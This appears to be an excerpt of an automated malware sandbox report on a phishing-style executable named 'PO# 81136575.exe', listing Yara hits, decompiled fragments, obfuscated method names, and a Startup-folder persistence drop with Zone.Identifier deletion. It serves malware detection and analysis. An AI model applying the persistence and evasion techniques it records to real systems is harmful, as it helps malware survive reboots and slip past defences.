                Source: Yara matchFile source: Process Memory Space: PO# 81136575.exe PID: 9020, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: sage.exe PID: 4568, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: sage.exe PID: 904, type: MEMORYSTR
                Source: PO# 81136575.exe, Hs8a.cs.Net Code: NewLateBinding.LateCall(rtbLog, (Type)null, "Invoke", new object[1] { (z0W)([SpecialName] () =>{NewLateBinding.LateSet(rtbLog, (Type)null, "SelectionStart", new object[1] { NewLateBinding.LateGet(rtbLog, (Type)null, "TextLength", new object[0], (string[])null, (Type[])null, (bool[])null) }, (string[])null, (Type[])null);NewLateBinding.LateSet(rtbLog, (Type)null, "SelectionLength", new object[1] { 0 }, (string[])null, (Type[])null);NewLateBinding.LateSet(rtbLog, (Type)null, "SelectionColor", new object[1] { r7CF.Value }, (string[])null, (Type[])null);NewLateBinding.LateCall(rtbLog, (Type)null, "AppendText", new object[1] { t4G7 + "\r\n" }, (string[])null, (Type[])null, (bool[])null, true);NewLateBinding.LateSet(rtbLog, (Type)null, "SelectionColor", new object[1] { NewLateBinding.LateGet(rtbLog, (Type)null, "ForeColor", new object[0], (string[])null, (Type[])null, (bool[])null) }, (string[])null, (Type[])null);}) }, (string[])null, (Type[])null, (bool[])null, true)
                Source: PO# 81136575.exe, Hs8a.cs.Net Code: NewLateBinding.LateCall(rtbLog, (Type)null, "Invoke", new object[1] { (z0W)([SpecialName] () =>{NewLateBinding.LateCall(rtbLog, (Type)null, "AppendText", new object[1] { t4G7 + "\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                Source: sage.exe.4.dr, Hs8a.cs.Net Code: NewLateBinding.LateCall(rtbLog, (Type)null, "Invoke", new object[1] { (z0W)([SpecialName] () =>{NewLateBinding.LateSet(rtbLog, (Type)null, "SelectionStart", new object[1] { NewLateBinding.LateGet(rtbLog, (Type)null, "TextLength", new object[0], (string[])null, (Type[])null, (bool[])null) }, (string[])null, (Type[])null);NewLateBinding.LateSet(rtbLog, (Type)null, "SelectionLength", new object[1] { 0 }, (string[])null, (Type[])null);NewLateBinding.LateSet(rtbLog, (Type)null, "SelectionColor", new object[1] { r7CF.Value }, (string[])null, (Type[])null);NewLateBinding.LateCall(rtbLog, (Type)null, "AppendText", new object[1] { t4G7 + "\r\n" }, (string[])null, (Type[])null, (bool[])null, true);NewLateBinding.LateSet(rtbLog, (Type)null, "SelectionColor", new object[1] { NewLateBinding.LateGet(rtbLog, (Type)null, "ForeColor", new object[0], (string[])null, (Type[])null, (bool[])null) }, (string[])null, (Type[])null);}) }, (string[])null, (Type[])null, (bool[])null, true)
                Source: sage.exe.4.dr, Hs8a.cs.Net Code: NewLateBinding.LateCall(rtbLog, (Type)null, "Invoke", new object[1] { (z0W)([SpecialName] () =>{NewLateBinding.LateCall(rtbLog, (Type)null, "AppendText", new object[1] { t4G7 + "\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                Source: sages.exe.14.drStatic PE information: 0xC7142059 [Sun Nov 3 05:36:25 2075 UTC]
                Source: C:\Users\user\Desktop\PO# 81136575.exeCode function: 0_2_0313F2B1 push esp; retf 0_2_0313F2B2
                Source: C:\Users\user\Desktop\PO# 81136575.exeCode function: 0_2_07274A1F pushad ; retf 0_2_07274A25
                Source: C:\Users\user\Desktop\PO# 81136575.exeCode function: 0_2_07274A74 pushfd ; retf 0046h0_2_07274A9A
                Source: C:\Users\user\Desktop\PO# 81136575.exeCode function: 0_2_07274AA1 pushfd ; retf 0046h0_2_07274AA2
                Source: C:\Users\user\Desktop\PO# 81136575.exeCode function: 0_2_072746DC push ss; ret 0_2_0727479E
                Source: C:\Users\user\Desktop\PO# 81136575.exeCode function: 0_2_07271408 push ss; ret 0_2_0727479E
                Source: C:\Users\user\Desktop\PO# 81136575.exeCode function: 0_2_072E7E2F push ecx; retf EFCDh0_2_072E7F9A
                Source: C:\Users\user\Desktop\PO# 81136575.exeCode function: 0_2_072ED0CC pushad ; ret 0_2_072ED0CD
                Source: C:\Users\user\Desktop\PO# 81136575.exeCode function: 0_2_072EC8DC push eax; retf 0_2_072EC8DD
                Source: C:\Users\user\Desktop\PO# 81136575.exeCode function: 0_2_077B7122 pushad ; ret 0_2_077B7133
                Source: C:\Users\user\Desktop\PO# 81136575.exeCode function: 0_2_077B5C61 push ecx; retf 0046h0_2_077B5C82
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeCode function: 14_2_02A4F2B1 push esp; retf 14_2_02A4F2B2
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeCode function: 14_2_06C07E2F push ecx; retf EFCDh14_2_06C07F9A
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeCode function: 14_2_06C0FBE3 push edi; ret 14_2_06C0FDDE
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeCode function: 14_2_06C0FDEC push eax; ret 14_2_06C0FE1D
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeCode function: 14_2_06F11675 push ds; retf 0040h14_2_06F116C6
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeCode function: 14_2_06F6BDF8 pushfd ; iretd 14_2_06F6C3DE
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeCode function: 14_2_06F66684 pushad ; retn 0040h14_2_06F666AE
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeCode function: 14_2_06F687C5 push es; iretd 14_2_06F68846
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeCode function: 14_2_06F6A39F push edx; retn 0040h14_2_06F6A3AE
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeCode function: 14_2_06F688A2 push eax; ret 14_2_06F688A9
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeCode function: 14_2_06F688AA pushfd ; ret 14_2_06F688C1
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeCode function: 14_2_06F6C417 pushfd ; iretd 14_2_06F6C3DE
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeCode function: 14_2_070DAD39 push eax; iretd 14_2_070DAD8E
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeCode function: 14_2_070D5C61 push ecx; retf 0046h14_2_070D5C82
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeCode function: 14_2_0FCA478D push eax; ret 14_2_0FCA478E
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeCode function: 14_2_0FCB25FF push es; ret 14_2_0FCB2637
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeCode function: 14_2_0FCB2565 push es; ret 14_2_0FCB2637
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeCode function: 14_2_0FCB94C2 push eax; ret 14_2_0FCB94F9
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeCode function: 14_2_0FCA4CD3 push esp; retf 14_2_0FCA4CD4
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeCode function: 14_2_0FCAECF2 push E12A8BA8h; retf 14_2_0FCAECF7
                Source: PO# 81136575.exeStatic PE information: section name: .text entropy: 7.089199817727075
                Source: sage.exe.4.drStatic PE information: section name: .text entropy: 7.089199817727075
                Source: 0.2.PO# 81136575.exe.471a7fe.7.raw.unpack, tT7bk4FnxbYaKqMtWjIqvyKWh4J9tkfAvLZ8e5Y4BU.csHigh entropy of concatenated method names: 'nn9DM7TZkpnl4dSPqnpPS2oW', 'LztRLhG61h4KFshxtO7P7', 'G4vjdlUHNvtWZenTXSNdtGwCIYmCoKE77', '_5fQycwGNtn0lBuMB2jteITZhMQF3wG', 'ZJSZEAUpgBzwUgSXvnbC6lEhXmP5VpN2nCiGvnzMTR'
                Source: 0.2.PO# 81136575.exe.471a7fe.7.raw.unpack, gabKErPURPS76kDKjrme.csHigh entropy of concatenated method names: 'EmwYECB1wGyvIA2snT', 'zQyq6GQCkVXH2m9ORWKDS7znEfc2l', 'X3TE6RCIZMD7ECwwVoqD8j43J8u', 'SwV7wVQkM24hXoCSpr83uLH4TEFtSUXME6LQS7', 'gIglw7CqsSJGzE2AtTN3JYbIYwYS1QQ7ADpw', 'aciMX0Q3f70STq8WXW'
                Source: 0.2.PO# 81136575.exe.471a7fe.7.raw.unpack, rtGPmvPIdl5IaacYtOxDvUDj4cyvAKDSBQSIKnjuJ.csHigh entropy of concatenated method names: 'lXIhNy5k2zuUtWijXRf3Smh', 'K04wNKQqGraj7cH31jV3', 'XjtDF35KWLF6l1is3R1Q6HxEJwEr3PbjtGbh2HVd2', 'lvOSFdRQCCluXgGa7jGQkU1jNoXRaK5EpfPYnW', 'gZQk7h6spRLFg3NwAmoe'
                Source: 0.2.PO# 81136575.exe.46c15fe.2.raw.unpack, tT7bk4FnxbYaKqMtWjIqvyKWh4J9tkfAvLZ8e5Y4BU.csHigh entropy of concatenated method names: 'nn9DM7TZkpnl4dSPqnpPS2oW', 'LztRLhG61h4KFshxtO7P7', 'G4vjdlUHNvtWZenTXSNdtGwCIYmCoKE77', '_5fQycwGNtn0lBuMB2jteITZhMQF3wG', 'ZJSZEAUpgBzwUgSXvnbC6lEhXmP5VpN2nCiGvnzMTR'
                Source: 0.2.PO# 81136575.exe.46c15fe.2.raw.unpack, gabKErPURPS76kDKjrme.csHigh entropy of concatenated method names: 'EmwYECB1wGyvIA2snT', 'zQyq6GQCkVXH2m9ORWKDS7znEfc2l', 'X3TE6RCIZMD7ECwwVoqD8j43J8u', 'SwV7wVQkM24hXoCSpr83uLH4TEFtSUXME6LQS7', 'gIglw7CqsSJGzE2AtTN3JYbIYwYS1QQ7ADpw', 'aciMX0Q3f70STq8WXW'
                Source: 0.2.PO# 81136575.exe.46c15fe.2.raw.unpack, rtGPmvPIdl5IaacYtOxDvUDj4cyvAKDSBQSIKnjuJ.csHigh entropy of concatenated method names: 'lXIhNy5k2zuUtWijXRf3Smh', 'K04wNKQqGraj7cH31jV3', 'XjtDF35KWLF6l1is3R1Q6HxEJwEr3PbjtGbh2HVd2', 'lvOSFdRQCCluXgGa7jGQkU1jNoXRaK5EpfPYnW', 'gZQk7h6spRLFg3NwAmoe'
                Source: 0.2.PO# 81136575.exe.3774b0c.0.raw.unpack, tT7bk4FnxbYaKqMtWjIqvyKWh4J9tkfAvLZ8e5Y4BU.csHigh entropy of concatenated method names: 'nn9DM7TZkpnl4dSPqnpPS2oW', 'LztRLhG61h4KFshxtO7P7', 'G4vjdlUHNvtWZenTXSNdtGwCIYmCoKE77', '_5fQycwGNtn0lBuMB2jteITZhMQF3wG', 'ZJSZEAUpgBzwUgSXvnbC6lEhXmP5VpN2nCiGvnzMTR'
                Source: 0.2.PO# 81136575.exe.3774b0c.0.raw.unpack, gabKErPURPS76kDKjrme.csHigh entropy of concatenated method names: 'EmwYECB1wGyvIA2snT', 'zQyq6GQCkVXH2m9ORWKDS7znEfc2l', 'X3TE6RCIZMD7ECwwVoqD8j43J8u', 'SwV7wVQkM24hXoCSpr83uLH4TEFtSUXME6LQS7', 'gIglw7CqsSJGzE2AtTN3JYbIYwYS1QQ7ADpw', 'aciMX0Q3f70STq8WXW'
                Source: 0.2.PO# 81136575.exe.3774b0c.0.raw.unpack, rtGPmvPIdl5IaacYtOxDvUDj4cyvAKDSBQSIKnjuJ.csHigh entropy of concatenated method names: 'lXIhNy5k2zuUtWijXRf3Smh', 'K04wNKQqGraj7cH31jV3', 'XjtDF35KWLF6l1is3R1Q6HxEJwEr3PbjtGbh2HVd2', 'lvOSFdRQCCluXgGa7jGQkU1jNoXRaK5EpfPYnW', 'gZQk7h6spRLFg3NwAmoe'
                Source: 0.2.PO# 81136575.exe.33865a4.1.raw.unpack, tT7bk4FnxbYaKqMtWjIqvyKWh4J9tkfAvLZ8e5Y4BU.csHigh entropy of concatenated method names: 'nn9DM7TZkpnl4dSPqnpPS2oW', 'LztRLhG61h4KFshxtO7P7', 'G4vjdlUHNvtWZenTXSNdtGwCIYmCoKE77', '_5fQycwGNtn0lBuMB2jteITZhMQF3wG', 'ZJSZEAUpgBzwUgSXvnbC6lEhXmP5VpN2nCiGvnzMTR'
                Source: 0.2.PO# 81136575.exe.33865a4.1.raw.unpack, gabKErPURPS76kDKjrme.csHigh entropy of concatenated method names: 'EmwYECB1wGyvIA2snT', 'zQyq6GQCkVXH2m9ORWKDS7znEfc2l', 'X3TE6RCIZMD7ECwwVoqD8j43J8u', 'SwV7wVQkM24hXoCSpr83uLH4TEFtSUXME6LQS7', 'gIglw7CqsSJGzE2AtTN3JYbIYwYS1QQ7ADpw', 'aciMX0Q3f70STq8WXW'
                Source: 0.2.PO# 81136575.exe.33865a4.1.raw.unpack, rtGPmvPIdl5IaacYtOxDvUDj4cyvAKDSBQSIKnjuJ.csHigh entropy of concatenated method names: 'lXIhNy5k2zuUtWijXRf3Smh', 'K04wNKQqGraj7cH31jV3', 'XjtDF35KWLF6l1is3R1Q6HxEJwEr3PbjtGbh2HVd2', 'lvOSFdRQCCluXgGa7jGQkU1jNoXRaK5EpfPYnW', 'gZQk7h6spRLFg3NwAmoe'
                Source: 0.2.PO# 81136575.exe.4825dae.3.raw.unpack, tT7bk4FnxbYaKqMtWjIqvyKWh4J9tkfAvLZ8e5Y4BU.csHigh entropy of concatenated method names: 'nn9DM7TZkpnl4dSPqnpPS2oW', 'LztRLhG61h4KFshxtO7P7', 'G4vjdlUHNvtWZenTXSNdtGwCIYmCoKE77', '_5fQycwGNtn0lBuMB2jteITZhMQF3wG', 'ZJSZEAUpgBzwUgSXvnbC6lEhXmP5VpN2nCiGvnzMTR'
                Source: 0.2.PO# 81136575.exe.4825dae.3.raw.unpack, gabKErPURPS76kDKjrme.csHigh entropy of concatenated method names: 'EmwYECB1wGyvIA2snT', 'zQyq6GQCkVXH2m9ORWKDS7znEfc2l', 'X3TE6RCIZMD7ECwwVoqD8j43J8u', 'SwV7wVQkM24hXoCSpr83uLH4TEFtSUXME6LQS7', 'gIglw7CqsSJGzE2AtTN3JYbIYwYS1QQ7ADpw', 'aciMX0Q3f70STq8WXW'
                Source: 0.2.PO# 81136575.exe.4825dae.3.raw.unpack, rtGPmvPIdl5IaacYtOxDvUDj4cyvAKDSBQSIKnjuJ.csHigh entropy of concatenated method names: 'lXIhNy5k2zuUtWijXRf3Smh', 'K04wNKQqGraj7cH31jV3', 'XjtDF35KWLF6l1is3R1Q6HxEJwEr3PbjtGbh2HVd2', 'lvOSFdRQCCluXgGa7jGQkU1jNoXRaK5EpfPYnW', 'gZQk7h6spRLFg3NwAmoe'
                Source: 0.2.PO# 81136575.exe.47739ee.6.raw.unpack, tT7bk4FnxbYaKqMtWjIqvyKWh4J9tkfAvLZ8e5Y4BU.csHigh entropy of concatenated method names: 'nn9DM7TZkpnl4dSPqnpPS2oW', 'LztRLhG61h4KFshxtO7P7', 'G4vjdlUHNvtWZenTXSNdtGwCIYmCoKE77', '_5fQycwGNtn0lBuMB2jteITZhMQF3wG', 'ZJSZEAUpgBzwUgSXvnbC6lEhXmP5VpN2nCiGvnzMTR'
                Source: 0.2.PO# 81136575.exe.47739ee.6.raw.unpack, gabKErPURPS76kDKjrme.csHigh entropy of concatenated method names: 'EmwYECB1wGyvIA2snT', 'zQyq6GQCkVXH2m9ORWKDS7znEfc2l', 'X3TE6RCIZMD7ECwwVoqD8j43J8u', 'SwV7wVQkM24hXoCSpr83uLH4TEFtSUXME6LQS7', 'gIglw7CqsSJGzE2AtTN3JYbIYwYS1QQ7ADpw', 'aciMX0Q3f70STq8WXW'
                Source: 0.2.PO# 81136575.exe.47739ee.6.raw.unpack, rtGPmvPIdl5IaacYtOxDvUDj4cyvAKDSBQSIKnjuJ.csHigh entropy of concatenated method names: 'lXIhNy5k2zuUtWijXRf3Smh', 'K04wNKQqGraj7cH31jV3', 'XjtDF35KWLF6l1is3R1Q6HxEJwEr3PbjtGbh2HVd2', 'lvOSFdRQCCluXgGa7jGQkU1jNoXRaK5EpfPYnW', 'gZQk7h6spRLFg3NwAmoe'
                Source: sages.exe.14.dr, tT7bk4FnxbYaKqMtWjIqvyKWh4J9tkfAvLZ8e5Y4BU.csHigh entropy of concatenated method names: 'nn9DM7TZkpnl4dSPqnpPS2oW', 'LztRLhG61h4KFshxtO7P7', 'G4vjdlUHNvtWZenTXSNdtGwCIYmCoKE77', '_5fQycwGNtn0lBuMB2jteITZhMQF3wG', 'ZJSZEAUpgBzwUgSXvnbC6lEhXmP5VpN2nCiGvnzMTR'
                Source: sages.exe.14.dr, gabKErPURPS76kDKjrme.csHigh entropy of concatenated method names: 'EmwYECB1wGyvIA2snT', 'zQyq6GQCkVXH2m9ORWKDS7znEfc2l', 'X3TE6RCIZMD7ECwwVoqD8j43J8u', 'SwV7wVQkM24hXoCSpr83uLH4TEFtSUXME6LQS7', 'gIglw7CqsSJGzE2AtTN3JYbIYwYS1QQ7ADpw', 'aciMX0Q3f70STq8WXW'
                Source: sages.exe.14.dr, rtGPmvPIdl5IaacYtOxDvUDj4cyvAKDSBQSIKnjuJ.csHigh entropy of concatenated method names: 'lXIhNy5k2zuUtWijXRf3Smh', 'K04wNKQqGraj7cH31jV3', 'XjtDF35KWLF6l1is3R1Q6HxEJwEr3PbjtGbh2HVd2', 'lvOSFdRQCCluXgGa7jGQkU1jNoXRaK5EpfPYnW', 'gZQk7h6spRLFg3NwAmoe'
                Source: 14.2.sage.exe.2cdebc0.0.raw.unpack, tT7bk4FnxbYaKqMtWjIqvyKWh4J9tkfAvLZ8e5Y4BU.csHigh entropy of concatenated method names: 'nn9DM7TZkpnl4dSPqnpPS2oW', 'LztRLhG61h4KFshxtO7P7', 'G4vjdlUHNvtWZenTXSNdtGwCIYmCoKE77', '_5fQycwGNtn0lBuMB2jteITZhMQF3wG', 'ZJSZEAUpgBzwUgSXvnbC6lEhXmP5VpN2nCiGvnzMTR'
                Source: 14.2.sage.exe.2cdebc0.0.raw.unpack, gabKErPURPS76kDKjrme.csHigh entropy of concatenated method names: 'EmwYECB1wGyvIA2snT', 'zQyq6GQCkVXH2m9ORWKDS7znEfc2l', 'X3TE6RCIZMD7ECwwVoqD8j43J8u', 'SwV7wVQkM24hXoCSpr83uLH4TEFtSUXME6LQS7', 'gIglw7CqsSJGzE2AtTN3JYbIYwYS1QQ7ADpw', 'aciMX0Q3f70STq8WXW'
                Source: 14.2.sage.exe.2cdebc0.0.raw.unpack, rtGPmvPIdl5IaacYtOxDvUDj4cyvAKDSBQSIKnjuJ.csHigh entropy of concatenated method names: 'lXIhNy5k2zuUtWijXRf3Smh', 'K04wNKQqGraj7cH31jV3', 'XjtDF35KWLF6l1is3R1Q6HxEJwEr3PbjtGbh2HVd2', 'lvOSFdRQCCluXgGa7jGQkU1jNoXRaK5EpfPYnW', 'gZQk7h6spRLFg3NwAmoe'
                Source: 14.2.sage.exe.40d3c4e.1.raw.unpack, tT7bk4FnxbYaKqMtWjIqvyKWh4J9tkfAvLZ8e5Y4BU.csHigh entropy of concatenated method names: 'nn9DM7TZkpnl4dSPqnpPS2oW', 'LztRLhG61h4KFshxtO7P7', 'G4vjdlUHNvtWZenTXSNdtGwCIYmCoKE77', '_5fQycwGNtn0lBuMB2jteITZhMQF3wG', 'ZJSZEAUpgBzwUgSXvnbC6lEhXmP5VpN2nCiGvnzMTR'
                Source: 14.2.sage.exe.40d3c4e.1.raw.unpack, gabKErPURPS76kDKjrme.csHigh entropy of concatenated method names: 'EmwYECB1wGyvIA2snT', 'zQyq6GQCkVXH2m9ORWKDS7znEfc2l', 'X3TE6RCIZMD7ECwwVoqD8j43J8u', 'SwV7wVQkM24hXoCSpr83uLH4TEFtSUXME6LQS7', 'gIglw7CqsSJGzE2AtTN3JYbIYwYS1QQ7ADpw', 'aciMX0Q3f70STq8WXW'
                Source: 14.2.sage.exe.40d3c4e.1.raw.unpack, rtGPmvPIdl5IaacYtOxDvUDj4cyvAKDSBQSIKnjuJ.csHigh entropy of concatenated method names: 'lXIhNy5k2zuUtWijXRf3Smh', 'K04wNKQqGraj7cH31jV3', 'XjtDF35KWLF6l1is3R1Q6HxEJwEr3PbjtGbh2HVd2', 'lvOSFdRQCCluXgGa7jGQkU1jNoXRaK5EpfPYnW', 'gZQk7h6spRLFg3NwAmoe'
                Source: 14.2.sage.exe.407aa5e.4.raw.unpack, tT7bk4FnxbYaKqMtWjIqvyKWh4J9tkfAvLZ8e5Y4BU.csHigh entropy of concatenated method names: 'nn9DM7TZkpnl4dSPqnpPS2oW', 'LztRLhG61h4KFshxtO7P7', 'G4vjdlUHNvtWZenTXSNdtGwCIYmCoKE77', '_5fQycwGNtn0lBuMB2jteITZhMQF3wG', 'ZJSZEAUpgBzwUgSXvnbC6lEhXmP5VpN2nCiGvnzMTR'
                Source: 14.2.sage.exe.407aa5e.4.raw.unpack, gabKErPURPS76kDKjrme.csHigh entropy of concatenated method names: 'EmwYECB1wGyvIA2snT', 'zQyq6GQCkVXH2m9ORWKDS7znEfc2l', 'X3TE6RCIZMD7ECwwVoqD8j43J8u', 'SwV7wVQkM24hXoCSpr83uLH4TEFtSUXME6LQS7', 'gIglw7CqsSJGzE2AtTN3JYbIYwYS1QQ7ADpw', 'aciMX0Q3f70STq8WXW'
                Source: 14.2.sage.exe.407aa5e.4.raw.unpack, rtGPmvPIdl5IaacYtOxDvUDj4cyvAKDSBQSIKnjuJ.csHigh entropy of concatenated method names: 'lXIhNy5k2zuUtWijXRf3Smh', 'K04wNKQqGraj7cH31jV3', 'XjtDF35KWLF6l1is3R1Q6HxEJwEr3PbjtGbh2HVd2', 'lvOSFdRQCCluXgGa7jGQkU1jNoXRaK5EpfPYnW', 'gZQk7h6spRLFg3NwAmoe'
                Source: 14.2.sage.exe.402185e.5.raw.unpack, tT7bk4FnxbYaKqMtWjIqvyKWh4J9tkfAvLZ8e5Y4BU.csHigh entropy of concatenated method names: 'nn9DM7TZkpnl4dSPqnpPS2oW', 'LztRLhG61h4KFshxtO7P7', 'G4vjdlUHNvtWZenTXSNdtGwCIYmCoKE77', '_5fQycwGNtn0lBuMB2jteITZhMQF3wG', 'ZJSZEAUpgBzwUgSXvnbC6lEhXmP5VpN2nCiGvnzMTR'
                Source: 14.2.sage.exe.402185e.5.raw.unpack, gabKErPURPS76kDKjrme.csHigh entropy of concatenated method names: 'EmwYECB1wGyvIA2snT', 'zQyq6GQCkVXH2m9ORWKDS7znEfc2l', 'X3TE6RCIZMD7ECwwVoqD8j43J8u', 'SwV7wVQkM24hXoCSpr83uLH4TEFtSUXME6LQS7', 'gIglw7CqsSJGzE2AtTN3JYbIYwYS1QQ7ADpw', 'aciMX0Q3f70STq8WXW'
                Source: 14.2.sage.exe.402185e.5.raw.unpack, rtGPmvPIdl5IaacYtOxDvUDj4cyvAKDSBQSIKnjuJ.csHigh entropy of concatenated method names: 'lXIhNy5k2zuUtWijXRf3Smh', 'K04wNKQqGraj7cH31jV3', 'XjtDF35KWLF6l1is3R1Q6HxEJwEr3PbjtGbh2HVd2', 'lvOSFdRQCCluXgGa7jGQkU1jNoXRaK5EpfPYnW', 'gZQk7h6spRLFg3NwAmoe'
                Source: 14.2.sage.exe.418600e.2.raw.unpack, tT7bk4FnxbYaKqMtWjIqvyKWh4J9tkfAvLZ8e5Y4BU.csHigh entropy of concatenated method names: 'nn9DM7TZkpnl4dSPqnpPS2oW', 'LztRLhG61h4KFshxtO7P7', 'G4vjdlUHNvtWZenTXSNdtGwCIYmCoKE77', '_5fQycwGNtn0lBuMB2jteITZhMQF3wG', 'ZJSZEAUpgBzwUgSXvnbC6lEhXmP5VpN2nCiGvnzMTR'
                Source: 14.2.sage.exe.418600e.2.raw.unpack, gabKErPURPS76kDKjrme.csHigh entropy of concatenated method names: 'EmwYECB1wGyvIA2snT', 'zQyq6GQCkVXH2m9ORWKDS7znEfc2l', 'X3TE6RCIZMD7ECwwVoqD8j43J8u', 'SwV7wVQkM24hXoCSpr83uLH4TEFtSUXME6LQS7', 'gIglw7CqsSJGzE2AtTN3JYbIYwYS1QQ7ADpw', 'aciMX0Q3f70STq8WXW'
                Source: 14.2.sage.exe.418600e.2.raw.unpack, rtGPmvPIdl5IaacYtOxDvUDj4cyvAKDSBQSIKnjuJ.csHigh entropy of concatenated method names: 'lXIhNy5k2zuUtWijXRf3Smh', 'K04wNKQqGraj7cH31jV3', 'XjtDF35KWLF6l1is3R1Q6HxEJwEr3PbjtGbh2HVd2', 'lvOSFdRQCCluXgGa7jGQkU1jNoXRaK5EpfPYnW', 'gZQk7h6spRLFg3NwAmoe'
                Source: 17.2.sage.exe.2d3d91c.0.raw.unpack, tT7bk4FnxbYaKqMtWjIqvyKWh4J9tkfAvLZ8e5Y4BU.csHigh entropy of concatenated method names: 'nn9DM7TZkpnl4dSPqnpPS2oW', 'LztRLhG61h4KFshxtO7P7', 'G4vjdlUHNvtWZenTXSNdtGwCIYmCoKE77', '_5fQycwGNtn0lBuMB2jteITZhMQF3wG', 'ZJSZEAUpgBzwUgSXvnbC6lEhXmP5VpN2nCiGvnzMTR'
                Source: 17.2.sage.exe.2d3d91c.0.raw.unpack, gabKErPURPS76kDKjrme.csHigh entropy of concatenated method names: 'EmwYECB1wGyvIA2snT', 'zQyq6GQCkVXH2m9ORWKDS7znEfc2l', 'X3TE6RCIZMD7ECwwVoqD8j43J8u', 'SwV7wVQkM24hXoCSpr83uLH4TEFtSUXME6LQS7', 'gIglw7CqsSJGzE2AtTN3JYbIYwYS1QQ7ADpw', 'aciMX0Q3f70STq8WXW'
                Source: 17.2.sage.exe.2d3d91c.0.raw.unpack, rtGPmvPIdl5IaacYtOxDvUDj4cyvAKDSBQSIKnjuJ.csHigh entropy of concatenated method names: 'lXIhNy5k2zuUtWijXRf3Smh', 'K04wNKQqGraj7cH31jV3', 'XjtDF35KWLF6l1is3R1Q6HxEJwEr3PbjtGbh2HVd2', 'lvOSFdRQCCluXgGa7jGQkU1jNoXRaK5EpfPYnW', 'gZQk7h6spRLFg3NwAmoe'
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeFile created: C:\Users\user\AppData\Local\Temp\sages.exeJump to dropped file
                Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeJump to dropped file

                Boot Survival

                Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeJump to dropped file
                Source: C:\Users\user\Desktop\PO# 81136575.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.lnkJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exe\:Zone.Identifier:$DATAJump to behavior

                Hooking and other Techniques for Hiding and Protection

                Source: C:\Users\user\Desktop\PO# 81136575.exeFile opened: C:\Users\user\Desktop\PO# 81136575.exe\:Zone.Identifier read attributes | deleteJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exe\:Zone.Identifier read attributes | deleteJump to behavior
                Source: C:\Users\user\Desktop\PO# 81136575.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exe, Process information set: NOOPENFILEERRORBOX (96 identical entries)
                Source: C:\Users\user\AppData\Local\Temp\sages.exe, Process information set: NOOPENFILEERRORBOX (63 identical entries)
                Source: C:\Windows\SysWOW64\clip.exe, Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX (5 identical entries)
                Source: C:\Users\user\AppData\Local\Temp\sages.exe, Process information set: NOOPENFILEERRORBOX (43 identical entries)

                Malware Analysis System Evasion

                Source: Yara match, File source: Process Memory Space: PO# 81136575.exe PID: 9020, type: MEMORYSTR
                Source: Yara match, File source: Process Memory Space: sage.exe PID: 4568, type: MEMORYSTR
                Source: Yara match, File source: Process Memory Space: sage.exe PID: 904, type: MEMORYSTR
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe, API/Special instruction interceptor: Address: 7FFAC542D144
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe, API/Special instruction interceptor: Address: 7FFAC5430594
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe, API/Special instruction interceptor: Address: 7FFAC542FF74
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe, API/Special instruction interceptor: Address: 7FFAC542D6C4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe, API/Special instruction interceptor: Address: 7FFAC542D864
